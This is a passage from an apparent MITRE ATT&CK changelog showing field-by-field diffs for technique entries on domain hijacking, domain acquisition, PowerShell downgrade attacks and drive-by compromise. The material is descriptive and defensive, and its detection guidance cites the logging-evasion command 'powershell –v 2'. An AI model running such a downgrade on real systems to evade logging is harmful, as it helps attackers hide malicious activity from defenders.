external_references[2]['description']Microsoft. (2020, December). Azure Sentinel Detections. Retrieved December 30, 2020.Dr. Nestori Syynimaa. (2017, November 16). Security vulnerability in Azure AD & Office 365 identity federation. Retrieved September 28, 2022.
external_references[2]['url']https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yamlhttps://o365blog.com/post/federation-vulnerability/
external_references[3]['source_name']Sygnia Golden SAMLMicrosoft - Azure AD Federation
external_references[3]['description']Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved January 6, 2021.Microsoft. (2018, November 28). What is federation with Azure AD?. Retrieved December 30, 2020.
external_references[3]['url']https://www.sygnia.co/golden-saml-advisoryhttps://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed
external_references[4]['source_name']CISA SolarWinds Cloud DetectionMicrosoft - Azure Sentinel ADFSDomainTrustMods
external_references[4]['description']CISA. (2021, January 8). Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments. Retrieved January 8, 2021.Microsoft. (2020, December). Azure Sentinel Detections. Retrieved December 30, 2020.
external_references[4]['url']https://us-cert.cisa.gov/ncas/alerts/aa21-008ahttps://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Sygnia Golden SAML', 'description': 'Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved January 6, 2021.', 'url': 'https://www.sygnia.co/golden-saml-advisory'}
x_mitre_contributorsPraetorian
x_mitre_data_sourcesCommand: Command Execution
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesCommand: Command Execution

[T1584.001] Compromise Infrastructure: Domains

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may hijack domains and/or subdomains that can bet1Adversaries may hijack domains and/or subdomains that can be
> used during targeting. Domain registration hijacking is the> used during targeting. Domain registration hijacking is the
> act of changing the registration of a domain name without t> act of changing the registration of a domain name without t
>he permission of the original registrant.(Citation: ICANNDom>he permission of the original registrant.(Citation: ICANNDom
>ainNameHijacking) An adversary may gain access to an email a>ainNameHijacking) Adversaries may gain access to an email ac
>ccount for the person listed as the owner of the domain. The>count for the person listed as the owner of the domain. The 
> adversary can then claim that they forgot their password in>adversary can then claim that they forgot their password in 
> order to make changes to the domain registration. Other pos>order to make changes to the domain registration. Other poss
>sibilities include social engineering a domain registration >ibilities include social engineering a domain registration h
>help desk to gain access to an account or taking advantage o>elp desk to gain access to an account or taking advantage of
>f renewal process gaps.  Subdomain hijacking can occur when > renewal process gaps.(Citation: Krebs DNS Hijack 2019)  Sub
>organizations have DNS entries that point to non-existent or>domain hijacking can occur when organizations have DNS entri
> deprovisioned resources. In such cases, an adversary may ta>es that point to non-existent or deprovisioned resources. In
>ke control of a subdomain to conduct operations with the ben> such cases, an adversary may take control of a subdomain to
>efit of the trust associated with that domain.(Citation: Mic> conduct operations with the benefit of the trust associated
>rosoft Sub Takeover 2020)> with that domain.(Citation: Microsoft Sub Takeover 2020)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Jeremy Galloway']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 15:51:26.715000+00:002022-04-20 14:10:48.814000+00:00
descriptionAdversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) An adversary may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps. Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019) Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
external_references[1]['source_name']ICANNDomainNameHijackingKrebs DNS Hijack 2019
external_references[1]['description']ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved March 6, 2017.Brian Krebs. (2019, February 18). A Deep Dive on the Recent Widespread DNS Hijacking Attacks. Retrieved February 14, 2022.
external_references[1]['url']https://www.icann.org/groups/ssac/documents/sac-007-enhttps://krebsonsecurity.com/2019/02/a-deep-dive-on-the-recent-widespread-dns-hijacking-attacks/
external_references[2]['source_name']Microsoft Sub Takeover 2020ICANNDomainNameHijacking
external_references[2]['description']Microsoft. (2020, September 29). Prevent dangling DNS entries and avoid subdomain takeover. Retrieved October 12, 2020.ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved March 6, 2017.
external_references[2]['url']https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeoverhttps://www.icann.org/groups/ssac/documents/sac-007-en
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft Sub Takeover 2020', 'description': 'Microsoft. (2020, September 29). Prevent dangling DNS entries and avoid subdomain takeover. Retrieved October 12, 2020.', 'url': 'https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover'}
x_mitre_data_sourcesDomain Name: Domain Registration
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesDomain Name: Domain Registration

[T1583.001] Acquire Infrastructure: Domains

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may purchase domains that can be used during tart1Adversaries may acquire domains that can be used during targ
>geting. Domain names are the human readable names used to re>eting. Domain names are the human readable names used to rep
>present one or more IP addresses. They can be purchased or, >resent one or more IP addresses. They can be purchased or, i
>in some cases, acquired for free.  Adversaries can use purch>n some cases, acquired for free.  Adversaries may use acquir
>ased domains for a variety of purposes, including for [Phish>ed domains for a variety of purposes, including for [Phishin
>ing](https://attack.mitre.org/techniques/T1566), [Drive-by C>g](https://attack.mitre.org/techniques/T1566), [Drive-by Com
>ompromise](https://attack.mitre.org/techniques/T1189), and C>promise](https://attack.mitre.org/techniques/T1189), and Com
>ommand and Control.(Citation: CISA MSS Sep 2020) Adversaries>mand and Control.(Citation: CISA MSS Sep 2020) Adversaries m
> may choose domains that are similar to legitimate domains, >ay choose domains that are similar to legitimate domains, in
>including through use of homoglyphs or use of a different to>cluding through use of homoglyphs or use of a different top-
>p-level domain (TLD).(Citation: FireEye APT28)(Citation: Pay>level domain (TLD).(Citation: FireEye APT28)(Citation: Paypa
>palScam) Typosquatting may be used to aid in delivery of pay>lScam) Typosquatting may be used to aid in delivery of paylo
>loads via [Drive-by Compromise](https://attack.mitre.org/tec>ads via [Drive-by Compromise](https://attack.mitre.org/techn
>hniques/T1189). Adversaries can also use internationalized d>iques/T1189). Adversaries may also use internationalized dom
>omain names (IDNs) to create visually similar lookalike doma>ain names (IDNs) and different character sets (e.g. Cyrillic
>ins for use in operations.(Citation: CISA IDN ST05-016)  Dom>, Greek, etc.) to execute "IDN homograph attacks," creating 
>ain registrars each maintain a publicly viewable database th>visually similar lookalike domains used to deliver malware t
>at displays contact information for every registered domain.>o victim machines.(Citation: CISA IDN ST05-016)(Citation: tt
> Private WHOIS services display alternative information, suc>_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: ht
>h as their own company data, rather than the owner of the do>track_unhcr)(Citation: lazgroup_idn_phishing)  Adversaries m
>main. Adversaries may use such private WHOIS services to obs>ay also acquire and repurpose expired domains, which may be 
>cure information about who owns a purchased domain. Adversar>potentially already allowlisted/trusted by defenders based o
>ies may further interrupt efforts to track their infrastruct>n an existing reputation/history.(Citation: Categorisation_n
>ure by using varied registration information and purchasing >ot_boundary)(Citation: Domain_Steal_CC)(Citation: Redirector
>domains with different domain registrars.(Citation: Mandiant>s_Domain_Fronting)(Citation: bypass_webproxy_filtering)  Dom
> APT1)>ain registrars each maintain a publicly viewable database th
 >at displays contact information for every registered domain.
 > Private WHOIS services display alternative information, suc
 >h as their own company data, rather than the owner of the do
 >main. Adversaries may use such private WHOIS services to obs
 >cure information about who owns a purchased domain. Adversar
 >ies may further interrupt efforts to track their infrastruct
 >ure by using varied registration information and purchasing 
 >domains with different domain registrars.(Citation: Mandiant
 > APT1)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesBob Sullivan. (2000, July 24). PayPal alert! Beware the 'PaypaI' scam. Retrieved March 2, 2017.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-630
values_changed
STIX FieldOld valueNew Value
modified2021-10-16 17:09:26.334000+00:002022-10-18 19:21:38.441000+00:00
descriptionAdversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. Adversaries can use purchased domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in operations.(Citation: CISA IDN ST05-016) Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering) Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
external_references[1]['source_name']capecPaypalScam
external_references[1]['url']https://capec.mitre.org/data/definitions/630.htmlhttps://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/
external_references[2]['source_name']CISA MSS Sep 2020CISA IDN ST05-016
external_references[2]['description']CISA. (2020, September 14). Alert (AA20-258A): Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity. Retrieved October 1, 2020.CISA. (2019, September 27). Security Tip (ST05-016): Understanding Internationalized Domain Names. Retrieved October 20, 2020.
external_references[2]['url']https://us-cert.cisa.gov/ncas/alerts/aa20-258ahttps://us-cert.cisa.gov/ncas/tips/ST05-016
external_references[3]['source_name']FireEye APT28CISA MSS Sep 2020
external_references[3]['description']FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.CISA. (2020, September 14). Alert (AA20-258A): Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity. Retrieved October 1, 2020.
external_references[3]['url']https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdfhttps://us-cert.cisa.gov/ncas/alerts/aa20-258a
external_references[4]['source_name']PaypalScambypass_webproxy_filtering
external_references[4]['description']Bob Sullivan. (2000, July 24). PayPal alert! Beware the 'PaypaI' scam. Retrieved March 2, 2017.Fehrman, B. (2017, April 13). How to Bypass Web-Proxy Filtering. Retrieved September 20, 2019.
external_references[4]['url']https://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/https://www.blackhillsinfosec.com/bypass-web-proxy-filtering/
external_references[5]['source_name']CISA IDN ST05-016FireEye APT28
external_references[5]['description']CISA. (2019, September 27). Security Tip (ST05-016): Understanding Internationalized Domain Names. Retrieved October 20, 2020.FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.
external_references[5]['url']https://us-cert.cisa.gov/ncas/tips/ST05-016https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
external_references[6]['source_name']Mandiant APT1Domain_Steal_CC
external_references[6]['description']Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.Krebs, B. (2018, November 13). That Domain You Forgot to Renew? Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.
external_references[6]['url']https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdfhttps://krebsonsecurity.com/2018/11/that-domain-you-forgot-to-renew-yeah-its-now-stealing-credit-cards/
external_references[7]['source_name']ThreatConnect Infrastructure Dec 2020tt_obliqueRAT
external_references[7]['description']ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.Malhotra, A., McKay, K. et al. (2021, May 13). Transparent Tribe APT expands its Windows malware arsenal . Retrieved July 29, 2022.
external_references[7]['url']https://threatconnect.com/blog/infrastructure-research-hunting/https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html
x_mitre_data_sources[4]Domain Name: Passive DNSApplication Log: Application Log Content
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'tt_httrack_fake_domains', 'description': 'Malhotra, A., Thattil, J. et al. (2022, March 29). Transparent Tribe campaign uses new bespoke malware to target Indian government officials . Retrieved September 6, 2022.', 'url': 'https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html'}
external_references{'source_name': 'Mandiant APT1', 'description': 'Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.', 'url': 'https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf'}
external_references{'source_name': 'Categorisation_not_boundary', 'description': 'MDSec Research. (2017, July). Categorisation is not a Security Boundary. Retrieved September 20, 2019.', 'url': 'https://www.mdsec.co.uk/2017/07/categorisation-is-not-a-security-boundary/'}
external_references{'source_name': 'Redirectors_Domain_Fronting', 'description': 'Mudge, R. (2017, February 6). High-reputation Redirectors and Domain Fronting. Retrieved July 11, 2022.', 'url': 'https://www.cobaltstrike.com/blog/high-reputation-redirectors-and-domain-fronting/'}
external_references{'source_name': 'lazgroup_idn_phishing', 'description': 'RISKIQ. (2017, December 20). Mining Insights: Infrastructure Analysis of Lazarus Group Cyber Attacks on the Cryptocurrency Industry. Retrieved July 29, 2022.', 'url': 'https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/'}
external_references{'source_name': 'httrack_unhcr', 'description': 'RISKIQ. (2022, March 15). RiskIQ Threat Intelligence Roundup: Campaigns Targeting Ukraine and Global Malware Infrastructure. Retrieved July 29, 2022.', 'url': 'https://www.riskiq.com/blog/labs/ukraine-malware-infrastructure/'}
external_references{'source_name': 'ThreatConnect Infrastructure Dec 2020', 'description': 'ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.', 'url': 'https://threatconnect.com/blog/infrastructure-research-hunting/'}
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/630.html', 'external_id': 'CAPEC-630'}
x_mitre_contributorsOleg Kolesnikov, Securonix
x_mitre_contributorsMenachem Goldstein
x_mitre_data_sourcesNetwork Traffic: Network Traffic Content
x_mitre_data_sourcesNetwork Traffic: Network Connection Creation
x_mitre_data_sourcesDomain Name: Passive DNS

[T1562.010] Impair Defenses: Downgrade Attack

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may downgrade or use a version of system featuret1Adversaries may downgrade or use a version of system feature
>s that may be outdated, vulnerable, and/or does not support >s that may be outdated, vulnerable, and/or does not support 
>updated security controls such as logging. For example, [Pow>updated security controls such as logging. For example, [Pow
>erShell](https://attack.mitre.org/techniques/T1059/001) vers>erShell](https://attack.mitre.org/techniques/T1059/001) vers
>ions 5+ includes Script Block Logging (SBL) which can record>ions 5+ includes Script Block Logging (SBL) which can record
> executed script content. However, adversaries may attempt t> executed script content. However, adversaries may attempt t
>o execute a previous version of PowerShell that does not sup>o execute a previous version of PowerShell that does not sup
>port SBL with the intent to [Impair Defenses](https://attack>port SBL with the intent to [Impair Defenses](https://attack
>.mitre.org/techniques/T1562) while running malicious scripts>.mitre.org/techniques/T1562) while running malicious scripts
> that may have otherwise been detected.(Citation: CrowdStrik> that may have otherwise been detected.(Citation: CrowdStrik
>e BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)  Advers>e BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)(Citatio
>aries may downgrade and use less-secure versions of various >n: att_def_ps_logging)  Adversaries may downgrade and use le
>features of a system, such as [Command and Scripting Interpr>ss-secure versions of various features of a system, such as 
>eter](https://attack.mitre.org/techniques/T1059)s or even ne>[Command and Scripting Interpreter](https://attack.mitre.org
>twork protocols that can be abused to enable [Adversary-in-t>/techniques/T1059)s or even network protocols that can be ab
>he-Middle](https://attack.mitre.org/techniques/T1557).(Citat>used to enable [Adversary-in-the-Middle](https://attack.mitr
>ion: Praetorian TLS Downgrade Attack 2014)>e.org/techniques/T1557).(Citation: Praetorian TLS Downgrade 
 >Attack 2014)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Mayuresh Dani, Qualys', 'Daniel Feichter, @VirtualAllocEx, Infosec Tirol']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 00:48:06.723000+00:002022-05-19 16:28:31.041000+00:00
descriptionAdversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging. For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018) Adversaries may downgrade and use less-secure versions of various features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557).(Citation: Praetorian TLS Downgrade Attack 2014)Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging. For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)(Citation: att_def_ps_logging) Adversaries may downgrade and use less-secure versions of various features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557).(Citation: Praetorian TLS Downgrade Attack 2014)
external_references[2]['source_name']Mandiant BYOL 2018att_def_ps_logging
external_references[2]['description']Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) – A Novel Red Teaming Technique. Retrieved October 8, 2021.Hao, M. (2019, February 27). Attack and Defense Around PowerShell Event Logging. Retrieved November 24, 2021.
external_references[2]['url']https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-techniquehttps://nsfocusglobal.com/attack-and-defense-around-powershell-event-logging/
external_references[3]['source_name']Praetorian TLS Downgrade Attack 2014inv_ps_attacks
external_references[3]['description']Praetorian. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved October 8, 2021.Hastings, M. (2014, July 16). Investigating PowerShell Attacks. Retrieved December 1, 2021.
external_references[3]['url']https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/https://powershellmagazine.com/2014/07/16/investigating-powershell-attacks/
x_mitre_detectionMonitor for commands or other activity that may be indicative of attempts to abuse older or deprecated technologies (ex: powershell –v 2). Also monitor for other abnormal events, such as execution of and/or processes spawning from a version of a tool that is not expected in the environment.Monitor for commands or other activity that may be indicative of attempts to abuse older or deprecated technologies (ex: powershell –v 2). Also monitor for other abnormal events, such as execution of and/or processes spawning from a version of a tool that is not expected in the environment. Monitor for Windows event ID (EID) 400, specifically the EngineVersion field which shows the version of PowerShell running and may highlight a malicious downgrade attack.(Citation: inv_ps_attacks)
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Mandiant BYOL 2018', 'description': 'Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) – A Novel Red Teaming Technique. Retrieved October 8, 2021.', 'url': 'https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique'}
external_references{'source_name': 'Praetorian TLS Downgrade Attack 2014', 'description': 'Praetorian. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved October 8, 2021.', 'url': 'https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/'}
x_mitre_data_sourcesProcess: Process Creation
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation

[T1189] Drive-by Compromise

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
New Description
t1Adversaries may gain access to a system through a user visitt1Adversaries may gain access to a system through a user visit
>ing a website over the normal course of browsing. With this >ing a website over the normal course of browsing. With this 
>technique, the user's web browser is typically targeted for >technique, the user's web browser is typically targeted for 
>exploitation, but adversaries may also use compromised websi>exploitation, but adversaries may also use compromised websi
>tes for non-exploitation behavior such as acquiring [Applica>tes for non-exploitation behavior such as acquiring [Applica
>tion Access Token](https://attack.mitre.org/techniques/T1550>tion Access Token](https://attack.mitre.org/techniques/T1550
>/001).  Multiple ways of delivering exploit code to a browse>/001).  Multiple ways of delivering exploit code to a browse
>r exist, including:  * A legitimate website is compromised w>r exist, including:  * A legitimate website is compromised w
>here adversaries have injected some form of malicious code s>here adversaries have injected some form of malicious code s
>uch as JavaScript, iFrames, and cross-site scripting. * Mali>uch as JavaScript, iFrames, and cross-site scripting. * Mali
>cious ads are paid for and served through legitimate ad prov>cious ads are paid for and served through legitimate ad prov
>iders. * Built-in web application interfaces are leveraged f>iders. * Built-in web application interfaces are leveraged f
>or the insertion of any other kind of object that can be use>or the insertion of any other kind of object that can be use
>d to display web content or contain a script that executes o>d to display web content or contain a script that executes o
>n the visiting client (e.g. forum posts, comments, and other>n the visiting client (e.g. forum posts, comments, and other
> user controllable web content).  Often the website used by > user controllable web content).  Often the website used by 
>an adversary is one visited by a specific community, such as>an adversary is one visited by a specific community, such as
> government, a particular industry, or region, where the goa> government, a particular industry, or region, where the goa
>l is to compromise a specific user or set of users based on >l is to compromise a specific user or set of users based on 
>a shared interest. This kind of targeted attack is referred >a shared interest. This kind of targeted campaign is often r
>to a strategic web compromise or watering hole attack. There>eferred to a strategic web compromise or watering hole attac
> are several known examples of this occurring.(Citation: Sha>k. There are several known examples of this occurring.(Citat
>dowserver Strategic Web Compromise)  Typical drive-by compro>ion: Shadowserver Strategic Web Compromise)  Typical drive-b
>mise process:  1. A user visits a website that is used to ho>y compromise process:  1. A user visits a website that is us
>st the adversary controlled content. 2. Scripts automaticall>ed to host the adversary controlled content. 2. Scripts auto
>y execute, typically searching versions of the browser and p>matically execute, typically searching versions of the brows
>lugins for a potentially vulnerable version.      * The user>er and plugins for a potentially vulnerable version.      * 
> may be required to assist in this process by enabling scrip>The user may be required to assist in this process by enabli
>ting or active website components and ignoring warning dialo>ng scripting or active website components and ignoring warni
>g boxes. 3. Upon finding a vulnerable version, exploit code >ng dialog boxes. 3. Upon finding a vulnerable version, explo
>is delivered to the browser. 4. If exploitation is successfu>it code is delivered to the browser. 4. If exploitation is s
>l, then it will give the adversary code execution on the use>uccessful, then it will give the adversary code execution on
>r's system unless other protections are in place.     * In s> the user's system unless other protections are in place.   
>ome cases a second visit to the website after the initial sc>  * In some cases a second visit to the website after the in
>an is required before exploit code is delivered.  Unlike [Ex>itial scan is required before exploit code is delivered.  Un
>ploit Public-Facing Application](https://attack.mitre.org/te>like [Exploit Public-Facing Application](https://attack.mitr
>chniques/T1190), the focus of this technique is to exploit s>e.org/techniques/T1190), the focus of this technique is to e
>oftware on a client endpoint upon visiting a website. This w>xploit software on a client endpoint upon visiting a website
>ill commonly give an adversary access to systems on the inte>. This will commonly give an adversary access to systems on 
>rnal network instead of external systems that may be in a DM>the internal network instead of external systems that may be
>Z.  Adversaries may also use compromised websites to deliver> in a DMZ.  Adversaries may also use compromised websites to
> a user to a malicious application designed to [Steal Applic> deliver a user to a malicious application designed to [Stea
>ation Access Token](https://attack.mitre.org/techniques/T152>l Application Access Token](https://attack.mitre.org/techniq
>8)s, like OAuth tokens, to gain access to protected applicat>ues/T1528)s, like OAuth tokens, to gain access to protected 
>ions and information. These malicious applications have been>applications and information. These malicious applications h
> delivered through popups on legitimate websites.(Citation: >ave been delivered through popups on legitimate websites.(Ci
>Volexity OceanLotus Nov 2017)>tation: Volexity OceanLotus Nov 2017)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-07-28 01:37:46.704000+00:002022-03-08 21:11:47.798000+00:00
descriptionAdversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Multiple ways of delivering exploit code to a browser exist, including: * A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting. * Malicious ads are paid for and served through legitimate ad providers. * Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content). Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise) Typical drive-by compromise process: 1. A user visits a website that is used to host the adversary controlled content. 2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes. 3. Upon finding a vulnerable version, exploit code is delivered to the browser. 4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place. * In some cases a second visit to the website after the initial scan is required before exploit code is delivered. Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ. Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Multiple ways of delivering exploit code to a browser exist, including: * A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting. * Malicious ads are paid for and served through legitimate ad providers. * Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or 